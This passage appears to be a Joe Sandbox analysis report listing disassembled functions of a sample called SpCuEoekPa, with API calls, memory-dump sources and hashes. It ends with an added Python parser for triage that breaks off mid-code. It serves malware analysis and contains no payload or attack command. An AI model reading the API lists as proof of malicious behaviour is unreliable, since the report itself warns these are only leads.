                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
                                                            • Instruction ID: 60d69606e79a169f1abfac810804f0a83c0e09875a0af3e556ee4dd94dae4ce1
                                                            • Opcode Fuzzy Hash: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
                                                            • Instruction Fuzzy Hash: 4421A3795082019FC311EF28C881DAA77E8EE59364F108A2DF4D9CB2E1D771DE55CB82
                                                            APIs
                                                              • Part of subcall function 003BF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003BDCD3,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?), ref: 003BF0CB
                                                              • Part of subcall function 003BF0BC: lstrcpyW.KERNEL32(00000000,?,?,003BDCD3,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BF0F1
                                                              • Part of subcall function 003BF0BC: lstrcmpiW.KERNEL32(00000000,?,003BDCD3,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?), ref: 003BF122
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BDCEC
                                                            • lstrcpyW.KERNEL32(00000000,?,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BDD12
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,003BEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003BDD46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 7fd5b891819c4f5879ec68c85cc6fd8d19b8cf7c5ea2fe948a115fe6234f40cf
                                                            • Instruction ID: 81fb0fb4bd7a86e2e68f1ab0a29e5187f93446291d6ef546cda275661c3279e1
                                                            • Opcode Fuzzy Hash: 7fd5b891819c4f5879ec68c85cc6fd8d19b8cf7c5ea2fe948a115fe6234f40cf
                                                            • Instruction Fuzzy Hash: FB11B13A200305EFCB26AF34CC459BA77A8FF45314B40816AFA46CB6A0FB719840C794
                                                            APIs
                                                            • _free.LIBCMT ref: 00395101
                                                              • Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
                                                              • Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
                                                              • Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
                                                            • Instruction ID: 58b545ada0af4e5d04efcfa53454f37c530f43f5bbe2b7c1e68cb7d51261dcb5
                                                            • Opcode Fuzzy Hash: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
                                                            • Instruction Fuzzy Hash: 3311A072A00B15AFCF333F74AC4575E3B989B543A1F21496AF9449E290DF74C9C18790
                                                            APIs
                                                            • _memset.LIBCMT ref: 003644CF
                                                              • Part of subcall function 0036407C: _memset.LIBCMT ref: 003640FC
                                                              • Part of subcall function 0036407C: _wcscpy.LIBCMT ref: 00364150
                                                              • Part of subcall function 0036407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00364524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00364533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0039D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
                                                            • Instruction ID: 2a7467fb96c510b4d12e7aa21bf7577e624b485726297da926add9d9a2417aa1
                                                            • Opcode Fuzzy Hash: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
                                                            • Instruction Fuzzy Hash: A12107709047849FEB338B25984ABE7BBEC9F02314F04409DE79E5B181C7742A84CB51
                                                            APIs
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 003D6399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D63A4
                                                            • _memmove.LIBCMT ref: 003D63D1
                                                            • inet_ntoa.WSOCK32(?), ref: 003D63DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
                                                            • Instruction ID: 1f094e983a96c8ef84b1e4ae9e5032c27f16d4359a5b9ba6721e387bbeb1f0fe
                                                            • Opcode Fuzzy Hash: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
                                                            • Instruction Fuzzy Hash: 88116372500109AFCB16FBA4DD86DEE77BCAF08310B148176F505EB2A1DB30AE14CB61
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 003B8B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
                                                            • Instruction ID: c60d3d8697f958c287a2759482cb4991112a3e90c575011972b70797977314f3
                                                            • Opcode Fuzzy Hash: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
                                                            • Instruction Fuzzy Hash: 37110A79901218FFDB11DBA5C885EDDBB78EB48710F204195EA00B7290DA716E11DB94
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
                                                            • GetClientRect.USER32(?,?), ref: 0039B5FB
                                                            • GetCursorPos.USER32(?), ref: 0039B605
                                                            • ScreenToClient.USER32(?,?), ref: 0039B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
                                                            • Instruction ID: cd058ac25bc09e7554dac1677ee68160d9a411963ddd3b00943bda8b0d21a763
                                                            • Opcode Fuzzy Hash: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
                                                            • Instruction Fuzzy Hash: 36114F35600459EFCF12EF98D8959FE77B8FB06300F408955F941EB180C770BA518BA5
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003BD84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003BD864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003BD879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003BD897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
                                                            • Instruction ID: 09477abdc93150647722cba2f2bb71758a97f2d3676be8414340c53e9f0f53f4
                                                            • Opcode Fuzzy Hash: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
                                                            • Instruction Fuzzy Hash: 70115E75605704DFE3218F51DC48F92BBBCEB00B05F108569A616D6890E7B1E5499FA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: c652ac84ad067a4a66f08cb5b8fbda01b031fcf7b2a87d3ac497c63b4f4275e5
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 42014C7245914ABBCF175F84CC42CEE3F66BB18350F598415FE18581B1D236C9B1AB81
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 003EB2E4
                                                            • ScreenToClient.USER32(?,?), ref: 003EB2FC
                                                            • ScreenToClient.USER32(?,?), ref: 003EB320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003EB33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
                                                            • Instruction ID: 76e46f260a7c56d6ab5b8888768e2feeabcfe4faba8b6803008ec09125475590
                                                            • Opcode Fuzzy Hash: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
                                                            • Instruction Fuzzy Hash: A11143B9D00249EFDB51CFA9D8849EEFBB9FB08310F108166E914E3260D775AA558F50
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 003C6BE6
                                                              • Part of subcall function 003C76C4: _memset.LIBCMT ref: 003C76F9
                                                            • _memmove.LIBCMT ref: 003C6C09
                                                            • _memset.LIBCMT ref: 003C6C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 003C6C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
                                                            • Instruction ID: 5eb219b98a38f61203f4fcaa3fa06c0c142fc896cc23b4bae77101fb931482fb
                                                            • Opcode Fuzzy Hash: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
                                                            • Instruction Fuzzy Hash: C3F05E3A200204ABCF026F55DC85E8ABF29EF45320F04C0A5FE089E267D771E911CBB4
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00362231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0036223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00362250
                                                            • GetStockObject.GDI32(00000005), ref: 00362258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0039BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0039BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0039BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0039BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0039BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 0039BEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
                                                            • Instruction ID: a3e97541c687a5ac1743140fc49feb3c6f4710e6a2fb765b24eb380c4af83279
                                                            • Opcode Fuzzy Hash: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
                                                            • Instruction Fuzzy Hash: 11E03031504184AEEF225F64FC4D7D87B19EB15332F018366FA69480E187B14580DB11
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 003B871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003B82E6), ref: 003B872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
                                                            • Instruction ID: 5bc798ad9a2b688d7f1a1b3e5f02055bd6ba51b1dade7969f20c33904ee34579
                                                            • Opcode Fuzzy Hash: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
                                                            • Instruction Fuzzy Hash: DCE086366122529FD7315FB0AD4DB963BACEF90795F158828B385CD0C0DA749841C750
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %?
                                                            • API String ID: 0-3131337030
                                                            • Opcode ID: 509ff7deb79b1c01381952891d58e889d642fec567af6c97b7a358fc7bea2a92
                                                            • Instruction ID: 2994db34890fd90290f9627f9541a729eed95920c4cdc959f6d197a80e213c01
                                                            • Opcode Fuzzy Hash: 509ff7deb79b1c01381952891d58e889d642fec567af6c97b7a358fc7bea2a92
                                                            • Instruction Fuzzy Hash: 89B1D4758001099BCF17EF94C8969FEBBB8FF44394F50C126E502AB299DB309E85CB95
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xbB$xbB
                                                            • API String ID: 3653519197-2672806994
                                                            • Opcode ID: 68078a8303f6706dcede5d41ab812c996ef0763df50a2573e45af330e8b86868
                                                            • Instruction ID: b2f04057feac0911b7a626e9fc6a8de2837c46baaf81b539e4fbf16c7b32a171
                                                            • Opcode Fuzzy Hash: 68078a8303f6706dcede5d41ab812c996ef0763df50a2573e45af330e8b86868
                                                            • Instruction Fuzzy Hash: 69B17E72A00109EFCB16EF54D891EBABBB9FF59300F15805AF9459B392EB70D941CB60
                                                            APIs
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • __wcsnicmp.LIBCMT ref: 003CB02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003CB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: e651f3c25b203df46aacfd190aa2ab985b0c55f9f3733a120d4bb0cd0af9b602
                                                            • Instruction ID: a00c297c6c6ae947560fa3bfd7f22bddc72ee220f267f322fb0ab24ac40410b8
                                                            • Opcode Fuzzy Hash: e651f3c25b203df46aacfd190aa2ab985b0c55f9f3733a120d4bb0cd0af9b602
                                                            • Instruction Fuzzy Hash: 69615D75A00215EFCB16DF94C892FAEB7B8EB08310F15806EF956EB291D770AE44CB50
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00372968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00372981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
                                                            • Instruction ID: 1d6bd6415ed87fbd3e4f474e0c90000a95211274b922992a7c70f5d03d3fc920
                                                            • Opcode Fuzzy Hash: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
                                                            • Instruction Fuzzy Hash: B05155B24087449BD321EF20D886BABBBECFF89344F41895DF2D8450A5DF318528CB66
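Every function record in this listing has the same fixed layout (an API list with call-site addresses, the memory-dump source, and the similarity identifiers ending in the instruction fuzzy hash), so the listing can be parsed mechanically for triage. The Python below is an added example and is not part of the Joe Sandbox report or its tooling. It parses a constructed excerpt copied from three of this report's own records (the critical-section, token and memory-status functions above), keeps inherited "Part of subcall function" entries separate from a function's direct calls, and flags records whose direct calls appear on a small watch-list. The watch-list and its annotations are the editor's assumptions rather than report findings; a hit is a triage lead only, because a compiled AutoIt binary ships the whole interpreter runtime and the presence of a runtime function is not evidence that the embedded script uses it.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function ADDR:" as the report prints inherited calls.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
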